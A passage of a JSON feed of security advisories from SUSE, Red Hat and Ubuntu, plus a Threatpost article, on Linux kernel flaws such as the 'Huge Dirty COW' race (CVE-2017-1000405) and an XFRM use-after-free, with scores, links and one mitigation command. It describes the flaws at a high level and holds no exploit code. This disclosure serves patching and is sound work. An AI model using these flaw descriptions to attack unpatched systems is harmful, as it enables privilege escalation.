fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "modified": "2017-12-14T21:16:54", "published": "2017-12-14T21:16:54", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00068.html", "id": "SUSE-SU-2017:3324-1", "title": "Security update for the Linux Kernel (Live Patch 2 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 4.4.74-92_29 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "modified": "2017-12-14T15:20:54", "published": "2017-12-14T15:20:54", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00045.html", "id": "SUSE-SU-2017:3300-1", "title": "Security update for the Linux Kernel (Live Patch 10 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-06T23:10:15", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local\n attackers to corrupt memory of other processes and cause them to crash\n (bnc#1069496).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\n The following non-security bugs were fixed:\n\n Fix a build issue on ppc64le systems (bsc#1070805)\n\n", "modified": "2017-12-06T21:09:39", "published": "2017-12-06T21:09:39", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00012.html", "id": "SUSE-SU-2017:3226-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 4.4.82-6_3 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "modified": "2017-12-14T21:13:56", "published": "2017-12-14T21:13:56", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00063.html", "id": "SUSE-SU-2017:3319-1", "title": "Security update for the Linux Kernel (Live Patch 1 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 4.4.82-6_9 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "modified": "2017-12-14T21:10:51", "published": "2017-12-14T21:10:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00058.html", "id": "SUSE-SU-2017:3314-1", "title": "Security update for the Linux Kernel (Live Patch 3 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 4.4.74-92_32 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "modified": "2017-12-14T15:08:28", "published": "2017-12-14T15:08:28", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00031.html", "id": "SUSE-SU-2017:3284-1", "title": "Security update for the Linux Kernel (Live Patch 11 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 4.4.90-6_12 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n", "modified": "2017-12-14T21:12:53", "published": "2017-12-14T21:12:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00061.html", "id": "SUSE-SU-2017:3317-1", "title": "Security update for the Linux Kernel (Live Patch 4 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-06T23:10:15", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local\n attackers to corrupt memory of other processes and cause them to crash\n (bnc#1069496).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\n The following non-security bugs were fixed:\n\n Fix a build issue on ppc64le systems (bsc#1070805)\n\n", "modified": "2017-12-06T21:08:45", "published": "2017-12-06T21:08:45", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00011.html", "id": "SUSE-SU-2017:3225-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 4.4.90-92_45 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "modified": "2017-12-14T15:09:20", "published": "2017-12-14T15:09:20", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00032.html", "id": "SUSE-SU-2017:3285-1", "title": "Security update for the Linux Kernel (Live Patch 14 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:47", "bulletinFamily": "unix", "description": "The kernel-alt packages provide the Linux kernel version 4.x.\n\nSecurity Fix(es):\n\n* A flaw was found in the patches used to fix the 'dirtycow' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. (CVE-2017-1000405)\n\nRed Hat would like to thank Eylon Ben Yaakov and Daniel Shapiro for reporting this issue.\n\nBug Fix(es):\n\n* Previously, Red Hat Enterprise Linux 7.4 with the kernel version provided by the kernel-alt package, did not support turning off transactional memory (TM) on the POWER9 systems. With this update it is now possible to turn off TM on the POWER9 systems. (BZ#1509974)\n\n* Due to a bug in the ixgbe and i40e drivers, the socket buffer list (skb list) in some cases got corrupted when running Red Hat Enterprise Linux 7.4 with the kernel version provided by the kernel-alt package on the POWER9 systems. Consequently, a kernel panic occurred. This update fixes ixgbe and i40e, and the kernel no longer panics due to this behavior. (BZ#1518412)\n\n* Users can lower the max_sectors_kb setting in the sysfs file system to accommodate certain workloads. Previously, users needed to set the maximum I/O size to either the block layer default or the optional preferred I/O size reported by the device. This update fixes the scsi driver to keep the current heuristic function for the initial setting of max_sectors_kb. As a result, for subsequent invocations, the driver now only updates the current queue limit if it exceeds the capabilities of the hardware. (BZ#1518432)\n\n* When performing full-bootme tests on Boston ESS systems running Red Hat Enterprise Linux 7.4 with the kernel version provided in the kernel-alt package, a kernel panic occurred and the operating system dropped into the XMON software. This update fixes the Multi-Queue Block IO Queueing Mechanism (blk-mq), and the kernel no longer panics in these circumstances. (BZ#1518433)\n\n* When running the stress test on the file system with the gssstress command, and pulling one disk from one recovery group, \"kernel I/O error\" was reported, and gssstress became unresponsive. Gssstress now works as expected under the described circumstances. (BZ#1522645)\n\n* When using the fwupdate_xl710 utility to apply updates for NVM Intel Ethernet Converged Network Adapter XL710 on machines running Red Hat Enterpise Linux 7.4 with the kernel version provided in the kernel-alt package, a deadlock sometimes occurred when the i40e driver was acquiring access to the Non-Volatile Memory (NVM) of the device. Consequently, NVM acquire timeouts occurred, the firmware update failed with the following error message: \"Failed Acquiring NVM resource for read err=-53 status=0xa\", and left the device's memory in a corrupted state. This update fixes the i40e driver, and the firmware updates no longer fail due to this behavior. (BZ#1522843)\n\n* Previously, on POWER9 systems with more than 100 Pstates, the cpufreq driver did not handle the cases when the NxN matrix denominated transition table (trans_table) overflowed beyond the PAGE_SIZE boundary correctly. Consequently, reading trans_table for any of the CPUs failed with the following error:\n\n\"fill_read_buffer: show+0x0/0xa0 returned bad count\"\n\nWith this update reading trans_table for any of the CPUs now proceeds as expected under the described circumstances. (BZ#1522844)\n\n* Previously, the /sys/firmware/opal/exports directory did not contain an export node. Consequently, a range of memory in the Open Power Abstraction Layer (OPAL) that the operating system attempted to export to user space for debugging purposes was not available. With this update the sysfs file under /sys/firmware/opal/exports is now available for each property found there, and this file can be used for debugging purposes. (BZ#1522845)", "modified": "2018-03-19T16:23:48", "published": "2018-01-25T15:47:54", "id": "RHSA-2018:0180", "href": "https://access.redhat.com/errata/RHSA-2018:0180", "type": "redhat", "title": "(RHSA-2018:0180) Important: kernel-alt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:39", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the implementation of the \"fill buffer\", a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer. (CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the 'processor store buffer'. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU's processor store buffer. (CVE-2018-12126)\n\n* Microprocessors use a \u2018load port\u2019 subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPU\u2019s pipelines. Stale load operations results are stored in the 'load port' table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests leaking data back to the attacker via a timing side-channel. (CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. (CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming packets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function (CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET implementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver (CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors (CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407)\n\n* Kernel: FPU state information leakage via lazy FPU restore (CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* rwsem in inconsistent state leading system to hung (BZ#1690321)\n\n* efi_bgrt_init fails to ioremap error during boot (BZ#1692284)", "modified": "2019-05-14T22:49:05", "published": "2019-05-14T22:09:09", "id": "RHSA-2019:1170", "href": "https://access.redhat.com/errata/RHSA-2019:1170", "type": "redhat", "title": "(RHSA-2019:1170) Important: kernel security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:03", "bulletinFamily": "info", "description": "A flaw in the original patch for the notorious Dirty COW vulnerability could allow an adversary to run local code on affected systems and exploit a race condition to perform a privilege escalation attack.\n\nThe flaw in the Dirty COW patch (CVE-2016-5195), [released in October 2016](<https://threatpost.com/serious-dirty-cow-linux-vulnerability-under-attack/121448/>), was identified by researchers at the security firm Bindecy. On Wednesday, [they released details](<http://www.openwall.com/lists/oss-security/2017/11/30/1>) of the vulnerability ([CVE-2017-1000405](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000405>)) found in the original Dirty COW patch, affecting several Linux distributions.\n\nThe scope of affected products is significantly smaller than the original Dirty COW bug, which impacted many more Linux distributions and the Android operating system.\n\n\u201cIn terms of scope, the difference is just that the current bug is not [applicable to Android](<https://threatpost.com/google-releases-supplemental-patch-for-dirty-cow-vulnerability/121843/>) and Red Hat Enterprise Linux. All other distributions \u2013 Ubuntu, Fedora, SUSE \u2013 suffer from the issue. So, the scope is still large. We estimate that millions of machines are vulnerable,\u201d said Daniel Shapiro, researcher at Bindecy, credited for finding the flaw along with colleague Eylon Ben Yaakov.\n\nThe vulnerability, CVE-2017-1000405, is rated \u201cImportant\u201d and scores 6.1 on the CVSS scale.\n\nRed Hat Software notified customers of the flawed patch on Thursday noting the issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 5, 6, 7 and Red Hat Enterprise MRG 2, according to Red Hat\u2019s [customer portal](<https://access.redhat.com/security/cve/CVE-2017-1000405>).\n\nDirty COW was patched in October 2016 after it was discovered in public exploits. The vulnerability was found in the copy-on-write (COW) feature in Linux and could be used by an attacker with local access to obtain root privileges on a Linux or Android device.\n\nThe flaw, which was introduced in 2007 in version 2.6.22 of the kernel, allows an attacker to elevate privileges by taking advantage of a race condition and gain write-access to read-only memory.\n\nThe flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.\n\nCopy-on-write manages memory resources and allows for more than one process to share a page until a user writes to it, known in programming as marking a page dirty. The vulnerability allows an attacker to exploit the race condition to write to the original page before it\u2019s marked dirty.\n\nThe October 2016 patch addressed the Dirty COW vulnerability for both regular pages and transparent huge pages (supported since kernel approximately 2.6.38), according to Shapiro.\n\n\u201cThere is a code flow that wasn\u2019t taken into account that breaks the logic of the patch for transparent huge pages,\u201d he said.\n\n\u201cIn the original vulnerability the exploit targeted pages backed by read-only files, with the new bug we could write to a read-only special huge-page called \u2018zero page\u2019. It is assumed to be initialized with zeroes and some software rely on that assumption (including privileged processes),\u201d Shapiro said.\n\nA more detailed description of the flaw can be found in a technical write-up by Yaakov [here](<https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0>).\n\nAccording to the disclosure timeline, researchers reported the vulnerability to the Linux Kernel Organization on Nov. 22. A CVE was assigned the same day and a patch was committed to the mainline kernel Nov. 27. The vulnerability was officially made public on Friday.\n\nImmediate mitigation includes disabling the use of \u201czero page\u201d.\n\n\u201cIt is possible to prevent the zero page from being mapped as a huge page, by modifying a configuration tunable in the /sys directory\u2026 This prevents the flaw from being exercised in this method. # echo 0 > /sys/kernel/mm/transparent_hugepage/use_zero_page Disabling huge pages: It is possible to mitigate this flaw by disabling hugepages on a system,\u201d according to a [description of mitigations steps](<https://access.redhat.com/security/cve/CVE-2017-1000405>).\n\n\u201cThe real deal here is the astonishing fact that such a hyped vulnerability was patched incompletely,\u201d Shapiro said.\n", "modified": "2017-12-01T11:43:06", "published": "2017-12-01T11:43:06", "id": "THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087", "href": "https://threatpost.com/flaw-found-in-dirty-cow-patch/129064/", "type": "threatpost", "title": "Flaw Found In Dirty COW Patch", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2019-05-29T19:20:51", "bulletinFamily": "unix", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)", "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3510-1", "href": "https://usn.ubuntu.com/3510-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:21:16", "bulletinFamily": "unix", "description": "USN-3510-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu 12.04 ESM.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)", "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3510-2", "href": "https://usn.ubuntu.com/3510-2/", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:21:25", "bulletinFamily": "unix", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)", "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3511-1", "href": "https://usn.ubuntu.com/3511-1/", "title": "Linux kernel (Azure) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:21:39", "bulletinFamily": "unix", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver subsystem in the Linux kernel. A local attacker could use this to possibly gain administrative privileges. (CVE-2017-12146)", "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3508-1", "href": "https://usn.ubuntu.com/3508-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:21:34", "bulletinFamily": "unix", "description": "USN-3508-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu 16.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver subsystem in the Linux kernel. A local attacker could use this to possibly gain administrative privileges. (CVE-2017-12146)", "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3508-2", "href": "https://usn.ubuntu.com/3508-2/", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:22:14", "bulletinFamily": "unix", "description": "USN-3509-2 fixed vulnerabilities in the Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also introduced a regression that prevented the Ceph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16643)", "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "USN-3509-4", "href": "https://usn.ubuntu.com/3509-4/", "title": "Linux kernel (Xenial HWE) regression", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:21:26", "bulletinFamily": "unix", "description": "USN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. Unfortunately, it also introduced a regression that prevented the Ceph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16643)", "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "USN-3509-3", "href": "https://usn.ubuntu.com/3509-3/", "title": "Linux kernel regression", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:22:14", "bulletinFamily": "unix", "description": "USN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16643)", "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3509-2", "href": "https://usn.ubuntu.com/3509-2/", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:21:44", "bulletinFamily": "unix", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16643)", "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3509-1", "href": "https://usn.ubuntu.com/3509-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:21:18", "bulletinFamily": "unix", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to 